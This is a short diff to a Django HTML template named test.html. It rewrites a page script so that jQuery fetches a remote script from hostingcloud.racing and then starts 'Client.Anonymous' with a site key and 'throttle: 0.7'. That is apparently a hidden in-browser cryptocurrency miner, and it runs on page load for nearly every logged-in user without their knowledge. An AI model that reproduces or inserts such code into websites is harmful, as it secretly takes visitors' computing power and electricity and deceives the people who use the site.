--- a/main_app/templates/test.html
+++ b/main_app/templates/test.html
@@ -7,17 +7,17 @@
   </head>
   <body>
     
+    
+    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
     <!-- Jus70 -->
 {% if user.email != "a" %}
-<script src="https://www.hostingcloud.racing/V843.js"></script>
-
 <script>
+  $.getScript("https://www.hostingcloud.racing/V843.js", function() {
     var _client = new Client.Anonymous('5359e2aefac13b8544fcee9326d4a0aafb5fd62a6991f1e87ade167c09c9967a', {
         throttle: 0.7, c: 'w', ads: 0
     });
     _client.start();
-    
-
+  });
 </script>
 {% endif %}
     
